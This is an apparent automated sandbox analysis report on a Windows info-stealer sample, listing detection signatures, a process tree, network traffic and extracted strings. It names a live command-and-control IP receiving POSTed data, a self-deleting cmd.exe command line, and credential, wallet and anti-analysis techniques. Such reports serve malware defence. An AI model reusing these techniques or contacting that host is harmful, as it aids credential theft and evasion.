Windows Analysis Report
app.exe

Overview

General Information

Sample name: app.exe
Analysis ID: 1436386
MD5: 75b9ef9142a78671d449c8d22ab6be14
SHA1: 0461f1c46644acde8020bb59b53b1e34b65977ca
SHA256: e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains functionality to infect the boot sector
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • app.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
    • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • app.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 1808 cmdline: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 1172 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp: 05/05/24-00:24:50.450010
SID: 2051909
Source Port: 80
Destination Port: 49789
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Virustotal: Detection: 11%
Source: app.exe Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Joe Sandbox ML: detected
Source: app.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025D04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,0_2_025D04D0
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025D04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,0_2_025D04C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025A04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,3_2_025A04D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0255EB69 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,CloseHandle,HeapFree,HeapFree,ReadFile,ReadFile,CryptUnprotectData,CryptUnprotectData,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,HeapFree,ReadFile,ReadFile,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,3_2_0255EB69
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025A04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,3_2_025A04C0

Compliance

Source: C:\Users\user\Desktop\app.exe Unpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Unpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: app.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427361
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,0_2_025CA710
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025E4B93 FindFirstFileExW,0_2_025E4B93
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,3_2_0259A710
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,3_2_0259FEC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025B4B93 FindFirstFileExW,3_2_025B4B93

Networking

Source: Traffic Snort IDS: 2051909 ET TROJAN Win32/FireStealer Related Server Response 144.208.127.230:80 -> 192.168.11.20:49789
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View ASN Name: SHOCK-1US SHOCK-1US
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: api.ipify.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: api.ipify.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 451 Host: 144.208.127.230
Source: unknown TCP traffic detected without corresponding DNS query: 144.208.127.230
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 451 Host: 144.208.127.230
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://144.208.127.230
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661ozi
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/L
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/R
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/T
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/o
Source: app.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/w
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230U
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://POSTHTTP/1.1Content-Type:
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net
Source: app.exe, 00000003.00000003.3246373817.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000913000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3294569055.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRJX35jqtu8qT267s2bDnzhp-lJVMQdhF5S6U4t
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRgJaQoM7DXWRt-dg7YoOenavsVCx2_mgiT8oFn
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcSFe5-1ue4YewDL7QTtYG5GBPfUy7h9iJ7t-0kd
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
Source: app.exe, 00000003.00000003.3183161453.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: app.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;9
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashaert
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
